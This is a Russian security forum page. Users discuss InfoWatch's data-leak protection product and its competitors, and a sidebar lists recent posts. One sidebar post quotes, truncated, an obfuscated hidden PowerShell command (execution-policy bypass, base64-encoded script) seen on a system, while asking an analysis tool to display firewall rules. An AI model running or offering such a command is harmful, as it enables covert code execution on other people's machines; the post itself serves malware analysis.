Перейти к содержанию
broker

InfoWatch представила новое программно-аппаратное решение ..

Recommended Posts

broker

:!: :!: Собственно мне не понятно.. зачем после статьи стоит линк обсудить на форуме, если надо в ручную тему создавать... :!: :!: :!:

Коллеги, защита информации не сводится к защите ТОЛЬКО от вредосного кода..

Какой опыт есть (не спец службы) в автоматизированной защите от утечки информации..

КТО-НИБУДЬ использовал продукт КАСПЕРСКОГО?

Поделиться сообщением

Сергей Ильин
Собственно мне не понятно.. зачем после статьи стоит линк обсудить на форуме, если надо в ручную тему создавать... :!:

Над автоматическим добавлением тем по обсуждению новостей мы уже работаем :wink:

Коллеги, защита информации не сводится к защите ТОЛЬКО от вредосного кода..

Какой опыт есть (не спец службы) в автоматизированной защите от утечки информации..

КТО-НИБУДЬ использовал продукт КАСПЕРСКОГО?

К сожалению, я лично не использовал продукт от InfoWatch, но насколько я знаю он успешно внедряется (внедрен) в ряде достаточно крупных компаний, последнее громкое внедрение - Внешторгбанк. Конкурентов у него практически нет, рынок защиты от внутренних угроз - непаханное поле.

Поделиться сообщением

broker

как нет конкурентов..

это вы зря..

в понедельник перечислю..

Поделиться сообщением

• PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...